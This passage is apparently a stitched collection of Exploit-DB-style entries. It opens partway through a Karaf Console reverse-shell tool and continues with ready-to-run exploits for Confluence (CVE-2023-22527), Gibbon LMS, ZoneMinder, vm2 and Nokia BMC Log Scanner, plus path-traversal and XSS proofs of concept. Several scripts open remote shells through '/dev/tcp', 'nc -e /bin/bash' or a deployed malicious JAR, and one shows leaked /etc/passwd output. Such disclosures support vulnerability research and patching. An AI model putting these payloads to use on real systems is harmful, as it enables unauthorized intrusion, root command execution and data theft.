b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
b"\x32"
# Items to be replaces within the bytecode of Activator.class
# <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e>
ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e"
# <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e>
ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e"
def parse():
"""
This function parses the command-line arguments.
"""
parser = argparse.ArgumentParser(
prog="Karaf-Console-RCE",
description="This tool will let you open a reverse shell from the "
"system that is running Karaf Console",
epilog="Happy Hacking! :)",
)
parser.add_argument("--rhost", dest="rhost",
help="remote host", type=str, required=True)
parser.add_argument("--rport", dest="rport",
help="remote port", type=int, required=True)
parser.add_argument("--lhost", dest="lhost",
help="local host", type=str, required=True)
parser.add_argument("--lport", dest="lport",
help="local port", type=int, required=True)
parser.add_argument("--creds", dest="creds",
help="credentials in format <username:password>",
type=str, required=True)
parser.add_argument("--version", action="version",
version="%(prog)s 0.1.0")
return parser.parse_args()
def extract_jsessionid(cookie):
"""
This function extracts the JSESSIONID from the cookie string.
"""
jsessionid = None
regex = re.findall("JSESSIONID=([^;]+)", cookie)
if len(regex) > 0:
jsessionid = regex[0]
return jsessionid
def authenticate(target, basic_auth):
"""
This function connects to the URL and retrieves the JSESSIONID
based on the Basic Authorization.
"""
jsessionid = None
headers = {
"Authorization": basic_auth
}
response = requests.get(target, headers=headers,
allow_redirects=False, timeout=10)
if (response.status_code == 302 and response.headers["Set-Cookie"]):
jsessionid = extract_jsessionid(response.headers["Set-Cookie"])
return jsessionid
def generate_payload(lhost, lport):
"""
This function generates the payload.
It replaces the template payload with the `lhost` and `lport` arguments.
"""
payload = None
lhost_byte_array = bytearray()
lhost_byte_array.append(len(lhost))
lhost_byte_array.extend(map(ord, lhost))
activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace(
ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array)
lport_str = str(lport)
lport_byte_array = bytearray()
lport_byte_array.append(len(lport_str))
lport_byte_array.extend(map(ord, lport_str))
activator_class_bytecodes = activator_class_bytecodes.replace(
ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array)
jar_bytes = io.BytesIO()
with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr("com/visionspace/osgi/revshell/Activator.class",
activator_class_bytecodes)
zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)
payload = jar_bytes.getvalue()
return payload
def deploy_payload(target, basic_auth, jsessionid, payload):
"""
This function connects to the Karaf Console and deployes the payload.
"""
success = False
url = f"{target}/bundles"
cookies = {
"JSESSIONID": jsessionid
}
headers = {
"Authorization": basic_auth
}
files = {
"bundlefile": (
"revshell.jar", payload, "application/x-java-archive")
}
data = {
"action": "install",
"bundlestart": "start",
"bundlestartlevel": 80
}
response = requests.post(url, headers=headers, cookies=cookies,
files=files, data=data, timeout=10,
allow_redirects=False)
if response.status_code == 302:
success = True
return success
def generate_basic_auth(creds):
"""
This function generates the Basic Authorization string based
on the credentials.
"""
creds_base64 = base64.b64encode(creds.encode()).decode()
basic_auth = f"Basic {creds_base64}"
return basic_auth
def create_target_url(rhost, rport):
"""
This function creates a target URL.
"""
target_url = f"http://{rhost}:{rport}/system/console"
return target_url
def main(args):
"""
Main function.
"""
target = create_target_url(args.rhost, args.rport)
print("[*] Login...")
basic_auth = generate_basic_auth(args.creds)
jsessionid = authenticate(target, basic_auth)
if jsessionid:
print("[+] Session established.")
print("[*] Generating payload...")
payload = generate_payload(args.lhost, args.lport)
if payload:
print("[*] Deploying payload...")
if deploy_payload(target, basic_auth, jsessionid, payload):
print("[+] Done.")
else:
print("[-] Failed to deploy the payload!")
else:
print("[-] Failed to generate the payload!")
else:
print("[-] Login failed!")
if __name__ == "__main__":
main(parse())
# Exploit Title: Nokia BMC Log Scanner Remote Code Execution
# Google Dork: N/A
# Date: November 29, 2023
# Exploit Author: Carlos Andres Gonzalez, Matthew Gregory
# Vendor Homepage: https://www.nokia.com/
# Software Link: N/A
# Version: 13
# Tested on: Linux
# CVE : CVE-2022-45899
Description
The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection
attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant
because this service runs as root.
Steps to Reproduce:
In the Search Pattern field, type:
;";command
Replacing the word "command" above with any Linux command.
Root access can be confirmed with the id command or any other command that would require
root access, such as displaying the contents of the /etc/shadow file."
This issue was fixed in version 13.1.
/*
# Exploit Title: vm2 Sandbox Escape vulnerability
# Date: 23/12/2023
# Exploit Author: Calil Khalil & Adriel Mc Roberts
# Vendor Homepage: https://github.com/patriksimek/vm2
# Software Link: https://github.com/patriksimek/vm2
# Version: vm2 <= 3.9.19
# Tested on: Ubuntu 22.04
# CVE : CVE-2023-37466
*/
const { VM } = require("vm2");
const vm = new VM();
const command = 'pwd'; // Change to the desired command
const code = `
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}
try {
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy({}, handler);
throw proxiedErr;
} catch ({ constructor: c }) {
const childProcess = c.constructor('return process')().mainModule.require('child_process');
childProcess.execSync('${command}');
}
`;
console.log(vm.run(code));
# Exploit Title: UPS Network Management Card 4 - Path Traversal
# Google Dork: inurl:nmc inurl:logon.htm
# Date: 2023-12-19
# Exploit Author: Víctor García
# Vendor Homepage: https://www.apc.com/
# Version: 4
# Tested on: Kali Linux
# CVE: N/A
# PoC:
curl -k
https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
dhcp:x:997:997::/var/run/dhcp:/bin/false
messagebus:x:998:998::/var/lib/dbus:/bin/false
mosquitto:x:999:999::/home/mosquitto:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
# Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated)
# Date: Apr 9, 2023
# Exploit Author: Saeed reza Zamanian
# Software Link: https://get.typo3.org/release-notes/11.5.24
# Version: 11.5.24
# Tested on: Kali 2022.3
# CVE : CVE-2023-30451
In TYPO3 11.5.24, the filelist component allows attackers (with access to the administrator panel),
to read arbitrary files by utilizing a directory traversal via the baseuri field, This is demonstrated through :
POST /typo3/record/edit with ../../../ and the parameter
data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF].
-----------------------------------------------------
To exploit this vulnerability, follow these steps:
1. Log in to the administrator panel.
2. Navigate to 'file' > 'Filelist' section.
3. Right-click on a file storage and select 'New.'
4. Set the base URI to "../../../" and save.
After creating the file storage, the final HTTP request should resemble the one below. Once the file storage is created, refresh the page, enabling you to browse any directory on the server.
To access "/etc/passwd," browse to the '/etc/' directory, search for 'passwd,' and view the file.
## Title: WEBIGniter v28.7.23 XSS
## Author: RedTeamer IT Security, Mesut Cetin
## Date: 09/04/2023
## Vendor: https://webigniter.net/
## Software: https://webigniter.net/demo
## Reference: https://portswigger.net/web-security/cross-site-scripting/stored
## Description:
During the user creation process, the 'your_name' parameter fails to adequately validate user input, rendering the system vulnerable to reflected cross-site scripting (XSS) attacks.
## PoC
To exploit this vulnerability, an attacker can inject malicious JavaScript code into the "your_name" parameter under https://webigniter.net/create-account during the user creation process. This code, when embedded within an image tag like this: <img src onerror="prompt(8)">, can be executed when the user navigates to the "users" page under their profile.
## Mitigation
To mitigate this risk, the "your_name" parameter should be subjected to rigorous input validation and encoding to ensure that all user input is sanitized and rendered harmless.
# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
# Date: 25/1/2024
# Exploit Author: MaanVader
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence
# Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
# Tested on: 8.5.3
# CVE : CVE-2023-22527
import requests
import argparse
import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from rich.console import Console
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Argument parsing
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
parser.add_argument("-u", "--url", help="Single Confluence Server URL")
parser.add_argument("-f", "--file", help="File containing list of IP addresses")
parser.add_argument("-c", "--command", help="Command to Execute")
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
args = parser.parse_args()
# Rich console for formatted output
console = Console()
# Function to send payload
def send_payload(url, command):
headers = {
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded'
}
payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
'&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
headers['Content-Length'] = str(len(payload))
full_url = f"{url}/template/aui/text-inline.vm"
response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
return response.text.split('<!DOCTYPE html>')[0].strip()
# Interactive shell function
def interactive_shell(url):
session = PromptSession()
console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
while True:
try:
cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
if cmd.lower() in ["exit", "quit"]:
break
response = send_payload(url, cmd)
console.print(response)
except KeyboardInterrupt:
break
except Exception as e:
console.print(f"[bold red]Error: {e}[/bold red]")
break
# Process file function
def process_file(file_path):
with open(file_path, 'r') as file:
for line in file:
ip = line.strip()
url = f"http://{ip}:8090"
console.print(f"Processing {url}")
print(send_payload(url, args.command))
# Main execution logic
if args.shell and args.url:
interactive_shell(args.url)
elif args.url and args.command:
print(send_payload(args.url, args.command))
elif args.file and args.command:
process_file(args.file)
else:
print("Error: Please provide a valid URL and a command or use the interactive shell option.")
# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version
# Date: 22.01.2024
# Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev )
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24725
import requests
import re
import sys
import base64
import urllib.parse
def login(target_host, target_port,email,password):
url = f'http://{target_host}:{target_port}/login.php?timeout=true'
headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}
data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
r = requests.post(url, headers=headers, data=data, allow_redirects=False)
print(url)
print(r.headers)
Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):
print("[X] Login successful!")
return Session_Cookie[4]
def generate_payload(command):
# Given base64-encoded string
### Actual Payload:
### a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B}
base64_encoded_string = 'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9'
command_size = len(command)
# Decode base64
decoded_bytes = base64.b64decode(base64_encoded_string)
decoded_string = decoded_bytes.decode('utf-8')
# URL decode
payload = urllib.parse.unquote(decoded_string)
# Replace placeholders in the decoded string
payload = payload.replace('COMMAND_SIZE', str(command_size))
payload = payload.replace('COMMAND', command)
print("[X] Payload Generated!")
return payload
def rce(cookie, target_host, target_port, command):
url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'
headers = {"Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710","Cookie": cookie}
payload = generate_payload(command)
data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
r = requests.post(url, headers=headers, data=data, allow_redirects=False)
print("[X] Request sent!")
start_index = r.text.find("<h2>Step 4 - Live Run</h2>")
end_index = r.text.find("<div class", start_index)
result = r.text[start_index+26:end_index].strip()
if result != '':
print("[X] Execution result: \n"+result)
else:
print("[X] Command failed or did not output anything.")
with open("pocresponse.html", "wb") as f:
f.write(r.content)
if __name__ == '__main__':
if len(sys.argv) != 6:
print("[X] Usage: script.py <target_host> <target_port/url> <email> <password> <command>")
print("[X] Example: python gibbon_rce.py 192.168.1.100 80/gibbon test.email@localhost.com password1 \"./nc -e /bin/bash 172.28.218.3 4444\"")
sys.exit(1)
cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4])
rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])
import re
import requests
from bs4 import BeautifulSoup
import argparse
import base64
# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
# Date: 12 December 2023
# Discovered by : @Unblvr1
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepage: https://zoneminder.com/
# Software Link: https://github.com/ZoneMinder/zoneminder
# Version: prior to 1.36.33 and 1.37.33
# Tested on: Arch Linux, Kali Linux
# CVE : CVE-2023-26035
# Github Link : https://github.com/rvizx/CVE-2023-26035
class ZoneMinderExploit:
def __init__(self, target_uri):
self.target_uri = target_uri
self.csrf_magic = None
def fetch_csrf_token(self):
print("[>] fetching csrt token")
response = requests.get(self.target_uri)
self.csrf_magic = self.get_csrf_magic(response)
if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):
print(f"[>] recieved the token: {self.csrf_magic}")
return True
print("[!] unable to fetch or parse token.")
return False
def get_csrf_magic(self, response):
return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)
def execute_command(self, cmd):
print("[>] sending payload..")
data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}
response = requests.post(f"{self.target_uri}/index.php", data=data)
print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")
def exploit(self, payload):
if self.fetch_csrf_token():
print(f"[>] executing...")
self.execute_command(payload)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
parser.add_argument('-p', '--port', required=True, help='port')
args = parser.parse_args()
# generating the payload
ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"
ps2 = base64.b64encode(ps1.encode()).decode()
payload = f"echo {ps2} | base64 -d | /bin/bash"
ZoneMinderExploit(args.target_url).exploit(payload)
# Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field
# Date: 2023-08-21
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://backdropcms.org/
# Version: 1.23.0
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/backdrop/node/add/post
2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from.
3- Press "Save" button.
XSS Payload ==> "<script>alert("post_body")</script>